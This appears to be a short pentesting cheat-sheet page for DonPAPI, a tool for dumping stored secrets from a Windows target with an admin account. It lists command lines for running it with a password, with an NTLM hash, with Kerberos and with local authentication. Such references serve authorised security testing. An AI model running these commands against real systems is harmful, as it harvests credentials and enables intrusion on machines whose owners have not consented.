Page cover image

DonPAPI

Dumps all secrets of the Target Machine with an Admin Account

$ DonPAPI.py domain/user:passw0rd@target

Using the User's hash

$ DonPAPI.py --hashes : domain/user@target

Using Kerberos (-k) and local auth (-local_auth)

$ DonPAPI.py -k domain/user@target

$ DonPAPI.py -local_auth user@target

Last updated